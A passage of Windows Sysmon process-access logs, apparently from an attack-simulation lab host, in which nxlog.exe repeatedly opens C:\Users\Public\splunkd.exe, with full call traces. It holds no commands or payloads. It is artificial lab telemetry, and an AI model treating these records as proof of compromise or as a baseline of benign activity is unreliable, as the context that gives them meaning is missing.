C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:44.716","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:45","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8180,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:45.716\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:45.716","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8181,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:46.732\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:46.732","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8182,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:47.732\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:47.732","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8183,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:48.748\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:48.748","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8184,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:49.748\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:49.748","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8185,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:50.763\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:50.763","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files 